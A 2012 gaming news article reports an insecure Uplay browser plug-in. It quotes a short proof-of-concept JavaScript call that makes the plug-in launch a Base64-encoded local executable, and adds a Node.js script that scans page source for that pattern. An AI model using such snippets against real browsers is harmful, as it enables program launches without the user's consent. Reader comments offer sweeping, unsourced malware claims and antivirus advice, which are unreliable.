
Ubisoft's Uplay blasted as 'rootkit', installs 'unsecure' browser plug-in [UPDATE]
Posted: 30.07.2012 11:45 by Simon Priest Comments: 7
Some coding enthusiasts have discovered a little something in Ubisoft's Uplay platform for PC leading others to blast it as a 'rootkit'. It stealthily installs a browser plug-in which isn't secure.

The plugin granted its discoverer "unexpectedly (at least to me) wide access" to websites. It's a rather embarrassing hiccup if true.

Naturally this oversight has upset a lot of PC users who have long railed against Ubisoft's PC DRM software suite.

UPDATE: Trend Micro's Rik Ferguson, director of the security research firm, has said it's "not a malicious root, just really bad code." It's "a huge risk".

"This certainly looks like an easily exploitable software flaw, but I'm not sure I would go as far as calling it a rootkit," commented director Ferguson. Ubisoft's Uplay is a mandatory install for any of their PC titles, meaning everyone is put at risk. The real problem is that the exploit has now gone public.

"The reports state the exploitable code is in the form of a browser plugin, the plugin does not attempt to hide its presence on your system and can be relatively simply disabled. It's not a malicious root, just really bad code," he continued.

Ubisoft must fix this 'backdoor' immediately, urged Ferguson. "Pushing out such easily exploitable code, to such an easily targeted platform as a web browser through such a huge gaming population presents a huge risk and will of course be of interest to online criminals," he gravely warned, speaking with CVG.

"Ubisoft should be patching this code as a matter of urgency and in the meantime, gamers should be disabling the plug-in."

Original story follows

Essentially, the plug-in potentially exposes users to actions by third parties without any confirmation or consent being needed. A simple trip into your browser's security settings, though, can easily disable the offending plug-in. The exploit revolves around ActiveX controls.

The reason people seem to label this a rootkit is that there's no mention of a plug-in being installed. By definition a rootkit is a "stealthy type of malicious software (malware) designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer."

The troublesome code:

x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play");
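
As an added illustration (not code from the article or from Ubisoft), the following Node.js example shows how a defender could statically triage saved page source for the pattern above: a reference to the application/x-uplaypc MIME type together with a Base64-encoded -orbit_exe_path argument, which it decodes to show the executable path the page asks the plug-in to open. The function names, verdict labels and sample strings are assumptions made for this example.

```javascript
// Added example (not from the article): static triage of page source for the
// Uplay plug-in MIME type and a Base64-encoded -orbit_exe_path argument.
const UPLAY_MIME = /application\/x-uplaypc/i;
// Base64 token after the flag, terminated by whitespace, a quote, or end of input.
const EXE_PATH_ARG = /-orbit_exe_path\s+([A-Za-z0-9+\/]+={0,2})(?=[\s"']|$)/g;

function decodePath(b64) {
  const text = Buffer.from(b64, 'base64').toString('latin1');
  // Report only decodings that are printable ASCII; anything else becomes null.
  return /^[\x20-\x7e]+$/.test(text) ? text : null;
}

function scanPage(source) {
  // Collapse whitespace so an argument string wrapped across lines still matches.
  const flat = source.replace(/\s+/g, ' ');
  const referencesPlugin = UPLAY_MIME.test(flat);
  const launchTargets = [];
  for (const m of flat.matchAll(EXE_PATH_ARG)) {
    launchTargets.push({ encoded: m[1], decoded: decodePath(m[1]) });
  }
  // Verdict labels are hypothetical names chosen for this example.
  let verdict = 'clean';
  if (referencesPlugin && launchTargets.length) verdict = 'launch-attempt';
  else if (referencesPlugin) verdict = 'plugin-reference';
  else if (launchTargets.length) verdict = 'argument-only';
  return { verdict, referencesPlugin, launchTargets };
}

// Constructed samples: the first reuses the argument string quoted in the article.
const SAMPLE_FLAGGED = [
  'x = document.createElement("OBJECT");',
  'x.type = "application/x-uplaypc";',
  'x.open("-orbit_product_id 1 -orbit_exe_path',
  'QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode")',
].join('\n');
const SAMPLE_BENIGN = '<object type="application/pdf" data="manual.pdf"></object>';

console.log(JSON.stringify(scanPage(SAMPLE_FLAGGED), null, 2));
console.log(scanPage(SAMPLE_BENIGN).verdict);
```

This is a static match only: a page that assembles the argument string at run time will not be flagged, so disabling the plug-in remains the mitigation the article recommends.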


Of course, Ubisoft's Uplay hasn't done this with malicious intent, as some would accuse, but this type of coding slip-up would certainly incriminate software released by an independent programmer. A degree of hysteria surrounds the exploit, leading to accusations that it makes a PC highly vulnerable.

Simply disable the browser plugin if you're concerned. Here's the original discovery.

We've contacted Ubisoft for comment.
Source: NeoGAF


Comments

By nocutius (SI Elite) on Jul 30, 2012
Thanks for the info.
By herodotus (SI Herodotus) on Jul 30, 2012
Hmmmm. Must check this out. The only bugbear I've heard many have are the two nasty and impossible to eradicate viruses currently infecting many a PC that use P2P for patching and mod downloading (and possibly naughty things) - "Google Redirect" and "Recommended for you". The only way to get rid of them is a complete re-format, and I've read some terrible horror stories about them.
So UPlay's "rootkit" is the least of worries.
By nocutius (SI Elite) on Jul 30, 2012
What do you mean about Google? Any links/explanation to clarify a bit?
By herodotus (SI Herodotus) on Jul 30, 2012
"Google redirect virus" is one of the most annoying, dangerous and toughest infections ever released on the internet. This virus redirects Google search results or normal website links to a malicious webpage which is related to some sort of advertisement or a page which enables hackers to gain information from you. Apart from Google redirect virus, it is also called Yahoo Redirect Virus or Bing Redirect Virus, based on which search engine is infected. Most recently a modification of this infection has popped up as Nginx Redirect Virus and Happili Redirect Virus.
In reality, all are the same.
Not many PC users know that Google redirect virus is not a virus, but in fact a rootkit. Rootkit infections unlike virus, spyware or trojan infections are very difficult to remove. In very rare cases, the google redirect virus rootkit is seen associated with Trojans which makes it more deadly. According to a 2011 report, Google redirect virus has already infected 45,00,000 computers wide, out of which 1/3rd is from US.

While eradicating it is nigh on impossible (despite the many "solutions" on the web) having AVAST 7.0 sometimes blocks malicious sites. It does not matter what security suite you have installed, this rootkit has been programmed to recognise all Anti-Virus, Anti-Malware and Anti-Spybot scans that look for it, and disguise itself so it can't be "seen".

An example. If I were to click on "News" after posting this to return me to the News page, I would instead be redirected to a malicious webpage. That's how bad it is. Eventually your PC slows to a crawl, infested with multiple viruses and trojans and stops to work completely (if you haven't been robbed of your life's savings by that time).

Google redirect virus is tough to remove because of its ability to hide deep inside operating systems and also remove traces and footprints on how it got inside your computer. As of today, not even a single security software suite on the market can guarantee you 100% protection from this infection.

I recommend the following be installed on everyone's PC:

1. Spybot S&D
2. Malwarebytes Anti-Malware
3. SUPERAntiSpyware

All are free, and offer the best protection and eradication currently available.
As far as Anti-Virus, I recommend using AVAST 7.0 (web browsing protection is great) or Microsoft Security Essentials.

Despite what many say, there is NO need to pay for an Anti-virus suite and many professional programmers swear they don't even use the free ones, that is they do not have an AV program installed, not one. It is Malware and Spyware that you really NEED to protect yourself from.
By herodotus (SI Herodotus) on Jul 30, 2012
Thanks Jonah.
By nocutius (SI Elite) on Jul 30, 2012
Thanks for the time hero, I misunderstood you as I thought that Google is doing something nasty again.

I guess I've been lucky so far.

Thanks for the recommendations about the anti spyware software too.
I've not heard of the last program but I've already been using the first two, will give the other one a go as well.